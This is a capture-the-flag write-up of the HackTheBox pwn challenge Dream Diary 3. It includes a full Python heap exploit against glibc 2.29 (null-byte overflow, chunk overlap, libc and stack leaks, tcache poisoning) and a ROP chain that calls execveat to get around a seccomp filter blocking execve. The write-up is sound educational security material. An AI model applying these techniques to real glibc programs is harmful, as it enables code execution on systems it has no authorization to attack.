Post

Dream Diary 3 @ HackTheBox

Dream Diary 3 @ HackTheBox

Dream Diary 3 is a 80 points pwn challenge on hackthebox that involes abusing a null byte overflow on the heap with glibc 2.29. All modern protections are enabled & seccomp is hindering us to call certain systemcalls.

Setup

The rpath and interpreter values have been tampered with and some values have been overwritten in the provided libc version, which makes it difficult to debug as pwndebug and gefs heap commands won’t work. To work around this issue, I developed the exploit against my local libc (which was also 2.29) and changed offsets later:

1
2
3
4
patchelf --print-rpath diary3
patchelf --print-interpreter diary3
patchelf --set-rpath '/usr/lib/x86_64-linux-gnu/libc.so.6' diary3
patchelf --set-interpreter '/usr/lib/x86_64-linux-gnu/ld-2.29.so' diary3

We start the code by writing some wrapper functions for the menu options of the program:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
def add(size, data=""):
    p.recvuntil('> ')
    p.sendline('1')
    p.recvuntil('size: ')
    p.sendline(str(size))
    p.recvuntil('data: ')
    p.sendline(data)


def edit(index, data):
    p.recvuntil('> ')
    p.sendline('2')
    p.recvuntil('index: ')
    p.sendline(str(index))
    p.recvuntil('data: ')
    p.sendline(data)

def show(index):
    p.recvuntil('> ')
    p.sendline('4')
    p.recvuntil('index: ')
    p.sendline(str(index))


def free(index):
    p.recvuntil('> ')
    p.sendline('3')
    p.recvuntil('index: ')
    p.sendline(str(index))

Currently the heap bins look clean:

1
2
3
4
5
6
7
8
9
10
11
12
13
pwndbg> bins
tcachebins
0x410 [  1]: 0x55ea9413c2a0 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0

The next preparation step at this point is to fill up 2 tcache lists of sizes 0xf0 and 0x128:

1
2
3
4
5
6
7
8
for i in range(7):
  add(0xf0)
for i in range(7):
  free(i)
for i in range(7):
  add(0x128)
for i in range(7):
  free(i)

Tcaches are a new single linked list structure in glibc >= 2.26. It creates such a list for every size that is freed and has a capacity of 7. Allocations will be served by the tcache first if one of the required size exists.

Heap bins:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
pwndbg> bins
tcachebins
0x100 [  7]: 0x558330cbecc0 —▸ 0x558330cbebc0 —▸ 0x558330cbeac0 —▸ 0x558330cbe9c0 —▸ 0x558330cbe8c0 —▸ 0x558330cbe7c0 —▸ 0x558330cbe6c0 ◂— 0x0
0x130 [  7]: 0x558330cbf4e0 —▸ 0x558330cbf3b0 —▸ 0x558330cbf280 —▸ 0x558330cbf150 —▸ 0x558330cbf020 —▸ 0x558330cbeef0 —▸ 0x558330cbedc0 ◂— 0x0
0x410 [  1]: 0x558330cbd2a0 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
empty

We create 3 adjacent chunks: A, B and C.

1
2
3
add(0x128, 'A'*0x128)
add(0x118, 'B'*0x118)
add(0x118, (b"C"*0xF8)+p64(0x21)+p64(0)+p64(0)+p64(0))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
0x5609072654d0:    0x0000000000000000  0x0000000000000131
0x5609072654e0:    0x4141414141414141  0x4141414141414141
...
0x5609072655f0:    0x4141414141414141  0x4141414141414141
0x560907265600:    0x4141414141414141  0x0000000000000121
0x560907265610:    0x4242424242424242  0x4242424242424242
...
0x560907265710:    0x4242424242424242  0x4242424242424242
0x560907265720:    0x4242424242424242  0x0000000000000121
0x560907265730:    0x4343434343434343  0x4343434343434343
...
0x560907265810:    0x4343434343434343  0x4343434343434343
0x560907265820:    0x4343434343434343  0x0000000000000021
0x560907265830:    0x0000000000000000  0x0000000000000000
0x560907265840:    0x0000000000000000  0x000000000001e7c1

Note: view heap with heap command.

The 0x118 sized chunks come from the wilderness, while the 0x128 sized chunk (A) comes from the tcache[0x130], which now has only 6 entries left.

Note that C is not just filled with ‘C’ like the other 2 chunks because I already prepared for a later stage (explanation follows).

Leaking the heap

To bypass one of glibc 2.29 checks later on, we need to leak a heap pointer. To do so, we can use the Tcaches.

1
2
3
4
5
6
7
8
free(0)
add(0x128)
show(0)
p.recvuntil (": ") 
leak_addr = u64(p.recvn(6).ljust (8 , b'\x00'))
leak_offset = 0x1D6-0x40 # change this 
fake_header = leak_addr + leak_offset
free(0)

We free the A chunk and add a new one. Because the tcache has still room (currently at 6 entries), it will go into the tcache and write the fd pointer to the just freed location.

1
2
3
0x55ceeca904d0:    0x0000000000000000  0x0000000000000131
0x55ceeca904e0:    0x000055ceeca9030a  0x0000000000000000
0x55ceeca904f0:    0x4141414141414141  0x4141414141414141

The reallocation of A will come from tcache aswell and will give back the exact address that was just freed. This means the fd pointer is now in the data section of A. Because we have not added any data to it on creation, we can read the pointer with show. Afterwards we free the A area again to clean up (tcache[0x130] now at 7).

Null byte overflow & overlapping chunks

The basic idea is to overflow a null byte from chunk B into C, resetting the the prev_inuse bit on Cs header. When we now free A and C, coalescing will kick in, combining all memory from C to A into one big chunk. B was never freed and is still allocated, while simultaneously considered inside the big free chunk.

There are 3 things to pay attention to here:

  • The previous size value between B and C must be forged, so it points to the start of A
  • glibc 2.29 checks on coalescing that the size of A is equal to the size of the forged previous size value
  • A null byte overwrite into Cs size can reduce the size of C considerably and it will be checked that there is a next chunk at the end of C.

Criterion 1 we can achieve by just writing the prev_size value to the end of B, because its still inside Bs data section.
Criterion 2 we fulfil by writing fake chunk metadata inside As data section.This fake metadata has our fake size and 2 pointers that point back to this fake chunk itself, requiring the heap leak we already got.
Criterion 3 we fulfil by writing fake chunk metadata inside Cs data section.

The null byte overwrite in this challenge is achieved by creating chunk and then editing its full size. The terminating null byte will overflow.

Fake header in A (Criterion 2):

1
add(0x128, p64(0)+p64(0x241)+p64(fake_header)+p64(fake_header))
1
2
3
4
0x55a2ac8274d0:    0x0000000000000000  0x0000000000000131
0x55a2ac8274e0:    0x0000000000000000  0x0000000000000241
0x55a2ac8274f0:    0x000055a2ac8274a0  0x000055a2ac8274a0
0x55a2ac827500:    0x414141414141410a  0x4141414141414141

Null byte overwrite from B into Cs metadata & fake previous size value:

1
2
for i in range(0x118-2, 0x118-9, -1):
    edit(1, 'B'*i + '\x40\x02')
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
0x55a2ac8274d0:    0x0000000000000000  0x0000000000000131
0x55a2ac8274e0:    0x0000000000000000  0x0000000000000241
0x55a2ac8274f0:    0x000055a2ac8274a0  0x000055a2ac8274a0
0x55a2ac827500:    0x414141414141410a  0x4141414141414141
...
0x55a2ac8275f0:    0x4141414141414141  0x4141414141414141
0x55a2ac827600:    0x4141414141414141  0x0000000000000121
0x55a2ac827610:    0x4242424242424242  0x4242424242424242
...
0x55a2ac827710:    0x4242424242424242  0x4242424242424242
0x55a2ac827720:    0x0000000000000240  0x0000000000000100
0x55a2ac827730:    0x4343434343434343  0x4343434343434343
...
0x55a2ac827810:    0x4343434343434343  0x4343434343434343
0x55a2ac827820:    0x4343434343434343  0x0000000000000021
0x55a2ac827830:    0x0000000000000000  0x0000000000000000
0x55a2ac827840:    0x0000000000000000  0x000000000001e7c1

Previous size was set to 0x240 and the 0x121 original size was set to 0x100, clearing the prev_inuse bit and reducing the size of C. Note that we now have fulfilled all of the criterions. There is fake 0x241 sized chunk (2), we set previous size and cleared prev_inuse (1) and created a another fake header after C because we reduced its size (3).

After coalescing:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
0x55dec580c4d0:    0x0000000000000000  0x0000000000000131
0x55dec580c4e0:    0x0000000000000000  0x0000000000000341
0x55dec580c4f0:    0x00007f9b7aa87ca0  0x00007f9b7aa87ca0
0x55dec580c500:    0x414141414141410a  0x4141414141414141
...
0x55dec580c5f0:    0x4141414141414141  0x4141414141414141
0x55dec580c600:    0x4141414141414141  0x0000000000000121
0x55dec580c610:    0x4242424242424242  0x4242424242424242
...
0x55dec580c710:    0x4242424242424242  0x4242424242424242
0x55dec580c720:    0x0000000000000240  0x0000000000000100
0x55dec580c730:    0x4343434343434343  0x4343434343434343
...
0x55dec580c810:    0x4343434343434343  0x4343434343434343
0x55dec580c820:    0x0000000000000340  0x0000000000000020

Note that the size has changed to 0x341, indicating that B was overlapped and we have one big free chunk. We will now abuse this to leak libc.

Leaking Libc

As we have an overlapped chunk, we can allocate a new chunk at the location where A originally was. This will shrink the big free chunk, which leads to its main_arena pointers being pushed down on the heap, into the area where B is still allocated:

1
2
3
4
5
6
7
add(0x110)
show(1)
p.recvuntil (": ")
main_arena = u64(p.recvn(6).ljust (8 , b'\x00'))
libc_base = main_arena - 0x1E4CA0
libc_environ = libc_base + 0x1E7D60 
free(0)
1
2
3
4
5
6
7
8
0x564822c474d0:    0x0000000000000000  0x0000000000000131
0x564822c474e0:    0x0000000000000000  0x0000000000000121
0x564822c474f0:    0x00007f3653e39f0a  0x00007f3653e39fd0
0x564822c47500:    0x414141414141410a  0x4141414141414141
...
0x564822c47600:    0x4141414141414141  0x0000000000000221
0x564822c47610:    0x00007f3653e39ca0  0x00007f3653e39ca0
0x564822c47620:    0x4242424242424242  0x4242424242424242

A show on B then leaks the pointer to main_arena. To find the exact offset inspect the leak address and subtract the libcbase (via vmmap) from it.

Getting a Write Primitive

To prepare, we clear up tcache[0x130] (which has 7 entries at this point). Because tcache[0x130] is empty now, the next allocation is served by the unsorted bin (the huge free chunk created by our overlap).

1
2
3
for i in range(7):
    add(0x128)
add(0x128)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
0x5611538f34d0:    0x0000000000000000  0x0000000000000131
0x5611538f34e0:    0x00005611538f330a  0x0000000000000000
0x5611538f34f0:    0x00007f71377d7f0a  0x00007f71377d7fd0
0x5611538f3500:    0x414141414141410a  0x4141414141414141
...
0x5611538f35f0:    0x4141414141414141  0x4141414141414141
0x5611538f3600:    0x4141414141414141  0x0000000000000131
0x5611538f3610:    0x00007f71377d7c0a  0x00007f71377d7ca0
0x5611538f3620:    0x4242424242424242  0x4242424242424242
...
0x5611538f3710:    0x4242424242424242  0x4242424242424242
0x5611538f3720:    0x0000000000000240  0x0000000000000100
0x5611538f3730:    0x4343434343434343  0x00000000000000f1
0x5611538f3740:    0x00007f71377d7ca0  0x00007f71377d7ca0
0x5611538f3750:    0x4343434343434343  0x4343434343434343
...

The last allocation we did is exactly on top of B because it comes from the unsorted bin. Remember that in the last step, by leaking libc, we pushed the unsorted bin down – this is the location we got back now.

With this setup, we can now read/write from/to any location.

Leaking the Stack

The libc given to us has no ““/bin/sh” string so we can not use one_daget, otherwise we could write to malloc_hook or free_hook and get a shell that way.

There is a neat trick to leak the stack address via the environ pointer. This is a pointer with a symbol in libc that points at the stack (you can get the offset from libc_base via (print(libc.symbols['environ'])).

We free the last 2 allocated chunks, resulting in 2 tache[0x130] entries. Then we edit B (which sits on top of the second just freed chunk) at fd pointer position so it contains a pointer to libc->environ:

1
2
3
4
free(8)
free(9)
for i in range(8-2, 8-9, -1):
    edit(1, b'B'*i + p64(libc_environ)[:6])
1
2
0x564f9c0a8600:    0x4141414141414141  0x0000000000000131
0x564f9c0a8610:    0x00007f0321d57d60  0x0000560000000000
1
0x130 [  2]: 0x564f9c0a8610 —▸ 0x7f0321d57d60 (environ) —▸ 0x7ffdf702c928 ◂— ...

Because we edited the fd pointer of B, tache[0x130] now links to libc->environ, meaning that the second next allocation will be at environ!

1
2
3
4
5
add(0x128, "A"*8)
add(0x128)
show(9)
p.recvuntil (": ") 
stack_leak = u64(p.recvn(6).ljust (8 , b'\x00'))

Show will read from the allocation in libc we just created and give us the stack pointer. We want to adjust this pointer a bit. We want to trigger our ropchain by calling exit from the main loop, this means we must write it at location behind the stack canary (which we do not want to touch at all). After getting the (static) offset in gdb via manual stepping we can adjust the leak pointer:

1
rop_loc = stack_leak - 0xf2

Rop & Seccomp

To go ahead with exploiting, we create a ropchain with ropper ropper --file libc.so.6 --chain execve and modify it to our needs. However ropper will call execve, which is blocked by seccomp. We can view the seccomp rules with seccomp-tools dump ./diary3:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x01 0x00 0xc000003e  if (A == ARCH_X86_64) goto 0003
 0002: 0x06 0x00 0x00 0x00000000  return KILL
 0003: 0x20 0x00 0x00 0x00000000  A = sys_number
 0004: 0x15 0x00 0x01 0x00000039  if (A != fork) goto 0006
 0005: 0x06 0x00 0x00 0x00000000  return KILL
 0006: 0x15 0x00 0x01 0x0000003b  if (A != execve) goto 0008
 0007: 0x06 0x00 0x00 0x00000000  return KILL
 0008: 0x15 0x00 0x01 0x0000003a  if (A != vfork) goto 0010
 0009: 0x06 0x00 0x00 0x00000000  return KILL
 0010: 0x15 0x00 0x01 0x00000002  if (A != open) goto 0012
 0011: 0x06 0x00 0x00 0x00000000  return KILL
 0012: 0x15 0x00 0x01 0x00000055  if (A != creat) goto 0014
 0013: 0x06 0x00 0x00 0x00000000  return KILL
 0014: 0x06 0x00 0x00 0x7fff0000  return ALLOW

This means the listed syscalls are blacklisted and can not be called without crashing the process. We can bypass these restrictions by using execveat, which has the following signature:

1
2
3
 int execveat(int dirfd, const char *pathname,
                    char *const argv[], char *const envp[],
                    int flags);

The following ropchain sets the registers accordingly and calls the function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
ropnop = p64(libc_base + 0x000000000003148f)
rop = b""
rop += ropnop
rop += ropnop
rop += p64(libc_base + (0x0000000000030e4d)) # 0x0000000000030e4d: pop r12; ret;
rop += b'//bin/sh'
rop += p64(libc_base + (0x0000000000026a25)) # 0x0000000000026a25: pop r13; ret;
rop += p64(libc_base + (0x00000000001e41a0))
rop += p64(libc_base + (0x00000000000a0da8)) # 0x00000000000a0da8: mov qword ptr [r13], r12; pop r12; pop r13; pop r14; ret;
rop += p64(0xdeadbeefdeadbeef)
rop += p64(0xdeadbeefdeadbeef)
rop += p64(0xdeadbeefdeadbeef)
rop += p64(libc_base + (0x0000000000030e4d)) # 0x0000000000030e4d: pop r12; ret;
rop += p64(0x0000000000000000)
rop += p64(libc_base + (0x0000000000026a25)) # 0x0000000000026a25: pop r13; ret;
rop += p64(libc_base + (0x00000000001e41a8))
rop += p64(libc_base + (0x00000000000a0da8)) # 0x00000000000a0da8: mov qword ptr [r13], r12; pop r12; pop r13; pop r14; ret;
rop += p64(0xdeadbeefdeadbeef)
rop += p64(0xdeadbeefdeadbeef)
rop += p64(0xdeadbeefdeadbeef)
rop += p64(libc_base + (0x0000000000026542)) # 0x0000000000026542: pop rdi; ret;
rop += p64(0)
rop += p64(libc_base + (0x0000000000026f9e)) # 0x0000000000026f9e: pop rsi; ret;
rop += p64(libc_base + (0x00000000001e41a0))
rop += p64(libc_base + (0x000000000012bda6)) # 0x000000000012bda6: pop rdx; ret;
rop += p64(0)
rop += p64(libc_base + (0x000000000012bda5))  # pop r10; ret;
rop += p64(0)
rop += p64(libc_base + (0x000000000010b31e))  # pop rcx; ret;
rop += p64(0)
rop += p64(libc_base + (0x0000000000047cf8)) # 0x0000000000047cf8: pop rax; ret;
#rop += p64(0x4000003b)
rop += p64(0x142)
rop += p64(libc_base + (0x00000000000cf6c5)) # 0x00000000000cf6c5: syscall; ret;

We use the same technique as before to write the chain to the stack at the specified address:

1
2
3
4
5
6
free(7)
free(8)
for i in range(8-2, 8-9, -1):
    edit(1, b'X'*i + p64(rop_loc)[:6]) 
add(0x128, "A"*8)
add(0x128, rop)

This basically finishes the exploit, as on choosing exit the rop chain will be executed.

Modifying offsets for remote

To get a shell on the remote end, we have to adjust the heap leak by -0x40 and add -0x10 to the fake header in A we used to overlap chunks.

Reading the Flag

After getting a shell we can use echo * to list files and then read the flag with while IFS= read -r line;do echo "$line";done < filename

Thanks to will135 for creating this awesome challenge and congrats to @r4j0x00 for getting first blood!

Full Exploit: Exploit

This post is licensed under CC BY 4.0 by the author.